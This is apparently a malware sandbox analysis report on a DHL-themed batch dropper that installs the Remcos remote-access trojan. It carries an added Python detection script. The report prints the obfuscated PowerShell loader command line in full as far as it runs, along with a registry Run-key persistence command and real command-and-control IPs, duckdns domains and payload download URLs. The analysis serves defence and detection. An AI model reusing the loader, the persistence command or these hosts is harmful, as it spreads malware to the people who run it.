Source: Process started; Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community; Data: Command: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Afbenyt" /t REG_EXPAND_SZ /d "%Pigling% -windowstyle 1 $Kolumners112=(gi 'HKCU:\Software\Abanga62\').GetValue('metanetwork');%Pigling% ($Kolumners112)", CommandLine: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Afbenyt" /t REG_EXPAND_SZ /d "%Pigling% -windowstyle 1 $Kolumners112=(gi 'HKCU:\Software\Abanga62\').GetValue('metanetwork');%Pigling% ($Kolumners112)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Afbenyt" /t REG_EXPAND_SZ /d "%Pigling% -windowstyle 1 $Kolumners112=(gi 'HKCU:\Software\Abanga62\').GetValue('metanetwork');%Pigling% ($Kolumners112)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7324, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Afbenyt" /t REG_EXPAND_SZ /d "%Pigling% -windowstyle 1 $Kolumners112=(gi 'HKCU:\Software\Abanga62\').GetValue('metanetwork');%Pigling% ($Kolumners112)", ProcessId: 1372, ProcessName: reg.exe
Source: Network Connection; Author: frack113; Data: DestinationIp: 27.124.114.163, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7256, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49721
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Afbenyt" /t REG_EXPAND_SZ /d "%Pigling% -windowstyle 1 $Kolumners112=(gi 'HKCU:\Software\Abanga62\').GetValue('metanetwork');%Pigling% ($Kolumners112)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Afbenyt" /t REG_EXPAND_SZ /d "%Pigling% -windowstyle 1 $Kolumners112=(gi 'HKCU:\Software\Abanga62\').GetValue('metanetwork');%Pigling% ($Kolumners112)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7256, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Afbenyt" /t REG_EXPAND_SZ /d "%Pigling% -windowstyle 1 $Kolumners112=(gi 'HKCU:\Software\Abanga62\').GetValue('metanetwork');%Pigling% ($Kolumners112)", ProcessId: 7324, ProcessName: cmd.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell.exe -windowstyle hidden "echo $Enchodus;function Haggardly($Afhjlpningens){ .($Remittable) ($Afhjlpningens)} function Slappelse199($Refallen){$Tidsskriftssamlingens170=5;do{$Eight+=$Refallen[$Tidsskriftssamlingens170];$Tidsskriftssamlingens170+=6;$Nysgerrighederne=Format-List} until(!$Refallen[$Tidsskriftssamlingens170])$Eight} ... (the rest of this command line is cut off in the report; it is the same command line as the powershell.exe PID 7304 entry in the process tree above)
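The Sigma hits above describe one persistence chain: msiexec.exe (the process the loader injected into) spawns cmd.exe, which runs reg.exe to add an HKCU\...\CurrentVersion\Run value of type REG_EXPAND_SZ. The value data starts with an environment variable (`%Pigling%`, whose content the report does not show) rather than a file path, and it fetches the next stage from a second registry value (`HKCU:\Software\Abanga62`, value `metanetwork`) with `gi ... .GetValue(...)` instead of from a file on disk, so a file-based autorun scan sees nothing. The Python below is an added example of the corresponding detection logic, written for this note and not part of the Joe Sandbox report. It runs over constructed Sysmon-style events (EventID 1 process create, 3 network connect, 13 registry SetValue) whose field names follow the Sigma data above, adds one benign Run-key write as a control, and returns the findings per event.

```python
import re
from typing import Dict, List

# Value written to HKCU\...\Run\Afbenyt (copied from the Sigma data in this report).
RUN_VALUE = (
    r"%Pigling% -windowstyle 1 $Kolumners112=(gi 'HKCU:\Software\Abanga62\')"
    r".GetValue('metanetwork');%Pigling% ($Kolumners112)"
)
RUN_KEY = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"

# Constructed Sysmon-style events modelled on the Sigma hits above.
EVENTS: List[Dict[str, str]] = [
    {"EventID": "1", "Image": r"C:\Windows\SysWOW64\cmd.exe",
     "ParentImage": r"C:\Windows\SysWOW64\msiexec.exe",
     "CommandLine": f'"C:\\Windows\\System32\\cmd.exe" /c REG ADD "{RUN_KEY}" /f /v "Afbenyt" '
                    f'/t REG_EXPAND_SZ /d "{RUN_VALUE}"'},
    {"EventID": "1", "Image": r"C:\Windows\SysWOW64\reg.exe",
     "ParentImage": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": f'REG ADD "{RUN_KEY}" /f /v "Afbenyt" /t REG_EXPAND_SZ /d "{RUN_VALUE}"'},
    {"EventID": "13", "Image": r"C:\Windows\SysWOW64\reg.exe", "EventType": "SetValue",
     "TargetObject": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Afbenyt",
     "Details": RUN_VALUE},
    {"EventID": "3", "Image": r"C:\Windows\SysWOW64\msiexec.exe", "Initiated": "true",
     "DestinationIp": "27.124.114.163", "DestinationPort": "443"},
    # Benign control (constructed): a plain executable path written to Run by explorer.exe.
    {"EventID": "13", "Image": r"C:\Windows\explorer.exe", "EventType": "SetValue",
     "TargetObject": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r'"C:\Program Files\Example\updater.exe" /background'},
]

# Run / RunOnce under CurrentVersion, as a key path or inside a quoted command line.
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(?:Once)?(?![A-Za-z])", re.IGNORECASE)
# Autorun data that begins with an environment variable instead of a path.
ENV_VAR_PREFIX_RE = re.compile(r"^\s*%[A-Za-z_][A-Za-z0-9_]*%")
# Autorun data that reads its real payload from another registry value.
REG_STAGE_RE = re.compile(r"\(gi\s+'HK(?:CU|LM)[:\\]|Get-ItemProperty\b|\.GetValue\(", re.IGNORECASE)
# Script hosts an installer has no reason to launch.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def check_event(ev: Dict[str, str]) -> List[str]:
    """Return the names of every rule the event triggers (empty list if none)."""
    hits: List[str] = []
    eid = ev.get("EventID")
    img = image_name(ev.get("Image", ""))
    parent = image_name(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    if eid == "1" and img == "reg.exe" and re.search(r"\bADD\b", cmd, re.I) and RUN_KEY_RE.search(cmd):
        hits.append("run_key_add_via_reg_exe")
    if eid == "1" and parent == "msiexec.exe" and img in SHELLS:
        hits.append("msiexec_spawns_shell")
    if eid == "13" and RUN_KEY_RE.search(ev.get("TargetObject", "")):
        details = ev.get("Details", "")
        if ENV_VAR_PREFIX_RE.match(details):
            hits.append("run_value_starts_with_env_var")
        if REG_STAGE_RE.search(details):
            hits.append("run_value_loads_stage_from_registry")
    if eid == "3" and img == "msiexec.exe" and ev.get("Initiated") == "true":
        hits.append("msiexec_outbound_connection")
    return hits


def scan(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Index of each event that triggered at least one rule, mapped to its hits."""
    return {i: hits for i, ev in enumerate(events) if (hits := check_event(ev))}


if __name__ == "__main__":
    for idx, hits in scan(EVENTS).items():
        print(idx, EVENTS[idx]["Image"], "->", ", ".join(hits))
```

The two registry-value rules are the ones worth keeping after this sample is gone: an autorun entry that begins with `%SOMEVAR%` only resolves at logon, so the binary it launches is invisible until the variable is looked up, and an entry that reads its payload from another registry value has no file for an on-disk scanner to flag. The `msiexec.exe` rules are noisier on hosts that install software constantly and should be scoped to msiexec instances with no `.msi` on their own command line.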
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-07T18:41:54.000325+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49723 | 192.169.69.26 | 57483 | TCP
2025-03-07T18:41:34.447638+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 192.169.69.26 | 57484 | TCP
2025-03-07T18:41:55.458789+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49724 | 192.169.69.26 | 57484 | TCP
2025-03-07T18:41:13.650752+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49721 | 27.124.114.163 | 443 | TCP


              AV Detection

Source: awb_post_dhl_delivery_documents_07_03_2025_000000000000000.bat; Virustotal: Detection: 13%
Source: Yara match; File source: 0000000E.00000002.2502020632.0000000006C01000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: msiexec.exe PID: 7256, type: MEMORYSTR
Source: Yara match; File source: C:\Users\user\AppData\Roaming\hsGaonspt.dat, type: DROPPED
Source: Submitted Sample; Integrated Neural Analysis Model: matched with 99.5% probability
Source: unknown; HTTPS traffic detected: 27.124.114.163:443 -> 192.168.2.4:49719 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 27.124.114.163:443 -> 192.168.2.4:49721 version: TLS 1.2
Source: Binary string: stem.Management.Automation.pdb; source: powershell.exe, 0000000A.00000002.1971988827.0000000007314000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: indows\System.Core.pdb; source: powershell.exe, 0000000A.00000002.1971988827.000000000737C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Targetore.pdbW; source: powershell.exe, 0000000A.00000002.1938539115.0000000000B93000.00000004.00000020.00020000.00000000.sdmp

              Networking

Source: Network traffic; Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49722 -> 192.169.69.26:57484
Source: Network traffic; Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49723 -> 192.169.69.26:57483
Source: Network traffic; Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49724 -> 192.169.69.26:57484
Source: unknown; DNS query: name: ortain7histas2.duckdns.org
Source: unknown; DNS query: name: ortain7histas1.duckdns.org
Source: unknown; DNS query: name: ortain7histas3.duckdns.org
Source: unknown; DNS query: name: ortain7histas4.duckdns.org
Source: Joe Sandbox View; IP Address: 192.169.69.26
Source: Joe Sandbox View; IP Address: 27.124.114.163
Source: Joe Sandbox View; ASN Name: WOWUS
Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View; JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic; Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49721 -> 27.124.114.163:443
Source: global traffic; HTTP traffic detected: GET /admin-user/Telefonkder.fla HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0; Host: planachiever.au; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /admin-user/pyeavywobFmAGe13.bin HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0; Host: planachiever.au; Cache-Control: no-cache
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1 (5 occurrences)
Source: global traffic; DNS traffic detected: DNS query: planachiever.au
Source: global traffic; DNS traffic detected: DNS query: ortain7histas1.duckdns.org
Source: global traffic; DNS traffic detected: DNS query: ortain7histas2.duckdns.org
Source: global traffic; DNS traffic detected: DNS query: ortain7histas3.duckdns.org
Source: global traffic; DNS traffic detected: DNS query: ortain7histas4.duckdns.org
Source: powershell.exe, 00000002.00000002.1453273914.0000021360A80000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.1424520874.0000021350C3D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1424520874.0000021350A11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1941362212.00000000048B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1424520874.0000021350C3D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.1424520874.0000021350A11000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000A.00000002.1941362212.00000000048B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000002.00000002.1453273914.0000021360A80000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.1453273914.0000021360A80000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.1453273914.0000021360A80000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.1424520874.0000021350C3D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1453273914.0000021360A80000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://planachiever.a
Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1424520874.0000021350C3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1424520874.0000021352BB4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://planachiever.au
Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2502020632.0000000006C01000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://planachiever.au/
Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://planachiever.au/a
Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://planachiever.au/ad
Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://planachiever.au/adm
Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://planachiever.au/admi
Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://planachiever.au/admin
Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://planachiever.au/admin-
Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://planachiever.au/admin-u
Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://planachiever.au/admin-us
Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://planachiever.au/admin-use
Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://planachiever.au/admin-user
Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://planachiever.au/admin-user/
Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://planachiever.au/admin-user/T
Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://planachiever.au/admin-user/Te
Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://planachiever.au/admin-user/Tel
Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://planachiever.au/admin-user/Tele
Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://planachiever.au/admin-user/Telef
Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://planachiever.au/admin-user/Telefo
Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://planachiever.au/admin-user/Telefon
Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://planachiever.au/admin-user/Telefonk
Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://planachiever.au/admin-user/Telefonkd
Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://planachiever.au/admin-user/Telefonkde
Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://planachiever.au/admin-user/Telefonkder
Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://planachiever.au/admin-user/Telefonkder.
Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://planachiever.au/admin-user/Telefonkder.f
Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://planachiever.au/admin-user/Telefonkder.fl
Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://planachiever.au/admin-user/Telefonkder.fla
Source: powershell.exe, 00000002.00000002.1424520874.0000021350C3D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://planachiever.au/admin-user/Telefonkder.flaP
Source: powershell.exe, 0000000A.00000002.1941362212.0000000004A07000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://planachiever.au/admin-user/Telefonkder.flaXR
Source: msiexec.exe, 0000000E.00000002.2502020632.0000000006C01000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2514364435.00000000223F0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://planachiever.au/admin-user/pyeavywobFmAGe13.bin
Source: msiexec.exe, 0000000E.00000002.2502020632.0000000006C01000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://planachiever.au/admin-user/pyeavywobFmAGe13.binZ
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown | Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown | HTTPS traffic detected: 27.124.114.163:443 -> 192.168.2.4:49719 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 27.124.114.163:443 -> 192.168.2.4:49721 version: TLS 1.2

              E-Banking Fraud

Source: Yara match | File source: 0000000E.00000002.2502020632.0000000006C01000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 7256, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\hsGaonspt.dat, type: DROPPED

              System Summary

Source: amsi32_8052.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7304, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 8052, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: awb_post_dhl_delivery_documents_07_03_2025_000000000000000.bat | Static file information: Suspicious name
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFC3DADB8F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFC3DADAB8B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFC3DBA9E4A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFC3DBA8925
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_0482E6A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_0482EF78
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_0482E360
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Afbenyt" /t REG_EXPAND_SZ /d "%Pigling% -windowstyle 1 $Kolumners112=(gi 'HKCU:\Software\Abanga62\').GetValue('metanetwork');%Pigling% ($Kolumners112)"
Source: C:\Windows\System32\cmd.exe | Process created: Commandline size = 6488
Source: unknown | Process created: Commandline size = 6512
Source: amsi32_8052.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7304, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 8052, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine | Classification label: mal100.troj.evad.winBAT@14/10@5/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\preconversion.Pri
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7316:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7260:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4508:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8060:120:WilError_03
Source: C:\Windows\SysWOW64\msiexec.exe | Mutant created: \Sessions\1\BaseNamedObjects\hoijuHgetgtso-VDU43F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sjktfdzu.fog.ps1
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\awb_post_dhl_delivery_documents_07_03_2025_000000000000000.bat" "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7304
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=8052
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: awb_post_dhl_delivery_documents_07_03_2025_000000000000000.bat | Virustotal: Detection: 13%
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "echo $Enchodus;function Haggardly($Afhjlpningens){ .($Remittable) ($Afhjlpningens)} function Slappelse199($Refallen){$Tidsskriftssamlingens170=5;do{$Eight+=$Refallen[$Tidsskriftssamlingens170];$Tidsskriftssamlingens170+=6;$Nysgerrighederne=Format-List} until(!$Refallen[$Tidsskriftssamlingens170])$Eight}$Gildhall=Slappelse199 'theren coate OverTPudsi.flerdW';$Gildhall+=Slappelse199 'SygemeKarbob Kontc For lCopori EfteeArbejNFarest';$Horede=Slappelse199 'InforMDinaroNavnezGymnoiChinolae osl Foraa .kin/';$Gl=Slappelse199 'Me inTBjerglDe.ousI per1Inani2';$Belastedes=' Veks[Mon.snDiskoESpit,tPol,g.stenusUrinreNoncorOrd ivGrossIUtn ec AndeE mstP NedgOFunkti nekdnOut iTWitchmRigsga remiN SacrALamb g RensEBillirStivn] S,he:Dermo:.orbrsDecceE ukseC AfveUV nusRGeitjISeglet AmorYDialypSammeRDokumORudysTUnderoLysthcGui aOTo.dkLAnmrk=Omsme$UforsGCottaL';$Horede+=Slappelse199 ' C.pr5Calas.Tidta0Repas .nder(TermiWHaemoi UdkanG shidradero TranwDviguschart EnterNMath,TF rdo Kul.1Outpi0Feeds.salte0I dpr;S.ork AsylWOversiProduns,yat6 aadr4Under;k nst Guildx egrl6chivy4Rea e;gidse UndorSekvevHurtl:Datam1Nedgj3Pla o4Hexap.Pr du0Punkt)Sabel SnuppG,ttace SlutctnderkOmpr.oDambr/Dalze2Reneg0 Resk1 erio0Oldti0 hiro1Tasim0Domen1.epar scrapFDebowi Squar ZimmeSkubbfPreopoalexaxGalla/ apir1Autu 3Rumle4Safts.Un la0';$Taw=Slappelse199 'UntirUsemifsBe,deE Dekar Rntg-Gul.iATakeoG ncabe N.kvN Uddat';$Aktricens=Slappelse199 'ValerhGr ektOverftMbelppRigolsDyret:Quake/ Told/s.ingpAutoglKonj,aEventnSkvulaTruffcFiskehTerebi Hydre St kvCowpae Ro.krPosta.Do imaPooliu Oc t/G bioa OstedHemskmKamiki VarinJ.rds- Unshu,algss Overe.sperram,ia/PerioTF.gomeKrat lDen aeBajerfGaaseoBrugsn Sys.kMervrdabrete stearJe,as. Snk f Dis.l No.aa';$dipolen=Slappelse199 'Aliqu>';$Remittable=Slappelse199 'Enjoii uncoePomolX';$Sabirs='Ratsbanes';$Moos='\preconversion.Pri';Haggardly (Slappelse199 'Kasse$WarslGLsninLSa ssOSovepb l ndAImparLHuppe:UdfolpOve,ilBeskru BattmPolonBR.gefu,ostsm N,utS Just=Therm$Bat lE.nterndefunvAfske: I noASamk pSynkrpTre aDAuktiAOveriThumouaUndse+Exaes$ fdmpmP.mpeo winko reinS');Haggardly (Slappelse199 'sk fe$ ava gNonrelChab,oIndopBB.asfaformiLSvagh:Mutags ,owle ForsROligov g.ffI Mis.c De rERe onPShuntrSpindiNe raSGenhreP litR TegnNDovneED zinsUford=Dioxi$plainA,ormuk NovaTSkrueRMazi ISubstCBandoeBreddnNymphS tegn.BeboesHogfiPNovusLudaanIHonortPa ul(Unpro$ ,inudDartbICha,gP WingOYadeflBundlE Wo.lnDacry)');Haggardly (Slappelse199 $Belastedes);$Aktricens=$Serviceprisernes[0];$Nonmaritally=(Slappelse199 ' Besk$BoliggToi.elArmbaoSkralbB gloaHallolUnarb:S oftrSmagsE edstv Ru,eIQuartSEksisoToraeR RuteYSam.e= Tra,nAmir eUnderWPille-Hy,erORopanB Rmebj TuriEVacuuCEpit.Tpassa UsurSTundeYUnderScerebtGenerE,oncoMJocos.Resbo$TubicgKatacIBrevvLMarauDMotelhpuffeaCenteLSeriol');Haggardly ($Nonmaritally);Haggardly (Slappelse199 'Pir q$malloRAnomae priv yleniAlgr s FrucoSevilrOrganyK,nge.UnproHFreelePa
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
